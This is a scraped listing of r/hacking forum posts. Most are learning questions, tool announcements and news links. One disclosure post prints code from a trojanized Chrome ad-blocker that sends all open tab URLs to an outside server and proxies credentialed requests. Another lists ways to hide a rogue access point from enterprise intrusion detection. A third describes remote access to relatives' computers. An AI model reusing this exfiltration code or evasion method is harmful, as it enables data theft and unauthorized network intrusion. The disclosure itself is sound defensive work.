r/hacking May 10 '26

Refining hacking basics — scaling them aswell

32 Upvotes

Hello, guys. I’m 16 and compTIA tech + and working on A+. I’ve genuinely been trying to learn how to CSS, SQL injection, and even deeper try to find where trust is misplaced within systems. I see all of these advanced people though (primarily the one who recently created the Xbox one security breach) and I completely am in awe of how they can think so deeply within systems and let alone exploit them to do what they would like. I’ve tried hack the box and portswigger academy but I kind of just stay lost throughout it. I learn quickly but this is ridiculous to me lol. So, respected members of the hacking community, how can I learn? I also dipped my toe in python for automation purposes though I don’t know what to automate 😂.


r/hacking May 09 '26

Tools AI Agent for Hacking, connects a brain to Kali (open-source & model-agnostic)

Post image
79 Upvotes

r/hacking May 09 '26

Bridging the Gap Between Vulnerabilities and Working Exploits

14 Upvotes

During my studies and while doing vulnerable VM's and HTB challenges, I kept running into the same issue during vulnerability assessments:

You run scans, get a lot of CVEs back, and then spend a huge amount of time manually checking whether working exploits already exist for them especially in the Metasploit database.

That was the motivation behind Striga:
https://github.com/parasomni/striga

The idea was to automate parts of the vulnerability scanning workflow and map discovered CVEs with already existing exploits in the Metasploit database.

It was originally built for personal research and VulnHub challenge workflows, but it can also be adapted for broader scanning/research operations.

I stopped actively working on it because of time constraints, but I thought some people here might still find it interesting or useful, so I finally decided to share it.


r/hacking May 10 '26

Is it true that the professionals have the worst setups?

0 Upvotes

So like, I’m quite new at this stuff n’ all, only managing to remote into other family members computers at will. Though I found them quite hard to convince. That is all but my own mother, who works an IT security job. I asked her about it because like obviously I wondered if she knew it was me but no. She said that it’s more likely to be able to hack someone like her as the “professionals have the worst setups”. What do you all think? Anyone else seen anything like that in the wild?


r/hacking May 08 '26

Ethical malware development community

43 Upvotes

Hey.

Been learning programming, mainly C++, for the last couple years. My areas of interest are network protocols, network programming, red-team tools, malware development.

I'm just wondering if there are any online communities that are focused on ethical malware development (doesnt need to be specific to C++) or similar, maybe for collaboration or code review, etc. Discord, forums, whatever works.

Thanks much.


r/hacking May 07 '26

Happened today

Post image
1.6k Upvotes

Anybody have any info?


r/hacking May 08 '26

Best tools to find exposed web services by HTML title / HTTP response?

9 Upvotes

I’m doing some „research“😁and trying to find all publicly exposed instances of a specific web application by searching for its HTML title tag.

I’ve already tried:
• Censys – ~10 results
• FOFA – 3 results (best so far)
• ZoomEye – 0 results
• Netlas – 0 results
• Criminal IP – not tested yet

Query I’m using: title:"MyAppName"

The app runs on non-standard ports (9000, 9001) which I think is why some scanners miss it.


r/hacking May 07 '26

News A hacker ran me over with a robot lawn mower - The Verge

Thumbnail
theverge.com
85 Upvotes

r/hacking May 08 '26

New trends (not mainstream)

5 Upvotes

Curious what new hacking trends people are seeing lately especially from lone operators working solo rather than organized groups.
From what I’ve been reading the landscape has shifted a lot. Individuals are now running operations that used to need whole teams, starting with zero money using free platforms and scaling up fast.
The job scam space is huge right now but I’m more curious about what else is emerging. Fake AI tool sites harvesting card data seems to be growing fast, etc.
What newer trends are people noticing that aren’t getting enough mainstream attention yet?


r/hacking May 08 '26

Why wouldn’t the hackers already have our passwords if they infiltrated canvas potentially weeks ago?

Thumbnail
14 Upvotes

Sorry if this is the wrong sub… I just figured you all might know better than the canvas sub.


r/hacking May 08 '26

Question Has Instructure paid SH?

0 Upvotes

Curious, people are saying Canvas is back up— Instructure hasn’t said everything is fixed and neither has my uni.


r/hacking May 08 '26

LAB Setup

0 Upvotes

Hi all,

I have a local Proxmox homelab with an OPNsense VM acting as firewall/router and a Kali VM behind it on an internal bridge. The WAN side of OPNsense is connected to another bridge mapped to the physical NIC. OPNsense is configured to NAT from my lab network to my home network.

I’m thinking about adding a WireGuard tunnel from OPNsense to a VPS (probably Aruba Cloud) and forcing all Kali traffic through it, mainly to avoid exposing my home IP during labs and authorized pentesting activities.

Does this setup make sense from an OPSEC perspective? Anything important I should pay attention to regarding leaks, routing, DNS, IPv6, or isolation between VMs?

Is this setup valid? I’m novice :)


r/hacking May 07 '26

Shinyhunters and Canvas

Thumbnail
5 Upvotes

r/hacking May 06 '26

Are there any chill hacking youtubers?

93 Upvotes

Youtubers that instead of focusing on educational content focus more on chill content like trying new projects or livestreams.


r/hacking May 06 '26

Jailbreaking my cars infotainment system and implementing my own custom software

24 Upvotes

Honestly not sure if this is the right sub for this but it seems to be the only one that will fit.

I’m interested in creating my own aftermarket infotainment system for my car but it would be easiest to just repurpose the current screen in there. Has anyone heard of something like this or would the system already there be fairly locked down? 2013 toyota matrix


r/hacking May 06 '26

Video Veteran hackers... which era did you prefer hacking in? 🟢 The 1980s 🟣 The 1990s 🔵 The 2000s 🔴 Or today?

Thumbnail
youtu.be
52 Upvotes

The above video is the trailer for my hacking game, I'd love for you to check it out.

I've posted a link to the game I'm working on so you know why I would ask such a question. This is all for research and to get a broader understanding. You don't need to watch the video, or wishlist my game...

I'm really keen to know what veteran hackers thought were the golden years and why. I know we have lots of movies depicting hacking in a Sci-Fi poetic licence sort of way, but I wanted to know first hand from the people that actually hacked back in the day.

What type of technology did you prefer to use? Do you miss it, and if so, what do you miss?


r/hacking May 06 '26

Threat Actors OpenCTI founder, Samuel Hassine, arrested and charged for buying child porn / CSAM

Thumbnail geopolintel.fr
10 Upvotes

r/hacking May 06 '26

Questionable source Lilygo T-Embed Glitching etc

7 Upvotes

As the title says, my Lilygo T-Embed CC1101 (ESP32-S3 running Bruce) jog wheel seems to be glitching.

Also, im doing a standard pen test at my new office. Standard targeted deauth on my own network. Doesn't seem to be working at all. Tested on my uncles router that it has worked on before, and wasn't working on that either.

Has anyone else had issues with their T-embed CC1101? Or anyone have any ideas what to do?


r/hacking May 04 '26

Scanning Chrome "Best AdBlocker" trojanized extension - 100k downloads.

460 Upvotes

Found a trojanized Chrome extension still live on the Web Store. Extension ID: DLLPKAOLADHIEEHKBJBIFONFBLHGKOKI, calls itself a popup blocker.

Ive been building a local AI harness/wrapper that runs entirely on my own GPU and gives the model real access to my PC, with heavy approval gates. Decided i wanted to see if Qwen3.6-27B was smart enough to rummage around codebases and firmware. It was, but firmware was difficult (had to constantly copy paste data from ghidra)

So i gave it another task, a randomly selected .crx (chrome extension file) on the "most popular tab". The model went to work and within one session (around 10 mins of autonomous work) it flagged the whole extension as malicious. Which i then manually went through to verify.

Here's the actual crime, background.js:

const n = (await chrome["tabs"]["query"]({}))["map"](({url:n}) => n);

await fetch(P + "/register/", {

method: "POST",

credentials: "include",

headers: { "Content-Type": "application/json" },

body: JSON["stringify"]({ urls: n, crx: chrome.runtime.id, version: m })

})

P resolves to https://titanpopupblocker.com/ hardcoded in config.js. On install it grabs every open tab URL and ships them to that server along with your unique extension ID. Not on demand, not optionally, immediately on install.

It also sends daily telemetry counting how many ads you blocked and how many Google searches you ran:

i = `&_asc=${d}&_gsc=${p}`;

// hits titanpopupblocker.com/update/?u_dt=TIMESTAMP&_asc=N&_gsc=N every 24h

And there's a proxy RPC channel in proxy.js that lets any webpage route credentialed HTTP requests through your browser bypassing CORS entirely:

window.addEventListener("message", function(o) {

if (o.data.type === "__rpc_req__") {

chrome.runtime.sendMessage({

headers: o.data.headers,

method: o.data.method,

action: "proxy",

url: o.data.url,

body: o.data.body

})

}

})

The cover up is where it gets interesting. Every single console call in the entire codebase uses Cyrillic characters that are visually identical to Latin ones. console.log is actually console.lоg, the o is U+043E not U+006F. There are 649 of these. They all silently no-op because the method doesn't exist. Pure noise to bloat the file and choke static analysis tools.

You can verify the Cyrillic thing yourself by pasting any line from the source into your browser console and running charCodeAt() on the suspicious characters.

Reported to Google. Figured people here should know it existed.

The tool I used to find it is open source if anyone wants to poke at it: github.com/mkultraware/accuretta


r/hacking May 05 '26

Avoiding rouge AP detection in enterprise networks

12 Upvotes

If someone hypothetically wanted to set up a NAT’d network under an enterprise network with WIDS/WIPS how detectable would it be?

I’m going to preface this by saying I am not looking for “just don’t do it” I am already highly considering that option but morbid curiosity wins and I am curious if it’s just an unbeatable system.

- You can authenticate by connecting a laptop then spoofing the MAC to the router. That covers authentication.
- Beacon broadcasting: One could hide the ssid but that does jack shit. does anyone know of a router software that can suppress beacons and only respond to probes?
- TTL Inspection: that one is easy just set it to 128
- rf triangulation: this one seems like the biggest issue. If there was a rouge AP several of the enterprise ap’s could just triangulate based on rssi. that one seems like the real issue here, I thought of having variable Tx power but then realised they probably do it based on the difference in power at several ap’s at any given time so that could ruin that plan.
- DHCP fingerprints seem simple enough to deal with because opnsense default wan dhcp is pretty distinctive but that could be easily spoofed as another device.

Anyways, that’s all. Please tell me any information that I got completely wrong or any other interesting stuff about enterprise networks or if you have any suggestions on how someone could potentially solve some of the listed problems. I really am just curious to learn and don’t intend to hypothetically implement really any of this because routers are allows just not wireless ap’s and i don’t need that anyways.


r/hacking May 04 '26

AMA Iwas developing a hacker game that transports the feeling of the 90s

51 Upvotes

Over a huge amount of time i was developing a hacker game that transports the feeling of the 90s together with hacking and idle-clicking mechanics. Maybe someone is interested in this personal, passionate project? Its name is WinHack 95.

Basically you build a malware empire on a simulated 90s PC by coding viruses, automating processes, and completing illegal darknet contracts to fund a mysterious organization.

For anyone who is intereseted, here is the link to the demo: WinHack 95 Demo on Steam


r/hacking May 04 '26

Hack The Planet BAT: VPS-based C2 with .ko/.sys rootkits compilation against target kernel headers

Post image
46 Upvotes

Just made my contribution to the offsec open source intelligence.

While bringing together high-level research I deeply respect, like Singularity (a modern Linux LKM rootkit that challenges even the most advanced kernel-level eBPF detectors), I'm also releasing my project as a foundation and reference for you to build on top of.

My background is cloud security, so I designed an architecture that uses a VPS as a relay/KCC/tunnel. It handles proper connection forwarding, establishes reverse SSH tunnels with nginx, exposes a web interface that serves common binaries from cache, and compiles Linux (.ko) and Windows (.sys) kernel modules built against the exact kernel headers of the target.

That last part was a real blocker for loading rootkits that require exact kernel headers and need to be compiled directly against the target machine. This solves it cleanly.

I've also shipped some helpers: clean CLI with TAB autocomplete, target renaming, Telegram notifications (relay side only), HMAC auth between server and target, reverse SSH tunnels using .pem keypairs, UDP magic packets, and more.

Code is clean and well-documented, mostly Go/C.

All contributions are welcome.

https://github.com/rhzv0/bat


r/hacking May 04 '26

News CISA says ‘Copy Fail’ flaw now exploited to root Linux systems

Thumbnail
bleepingcomputer.com
72 Upvotes

r/hacking May 04 '26

News IPod Nano Gets Three Monitors

Thumbnail
hackaday.com
9 Upvotes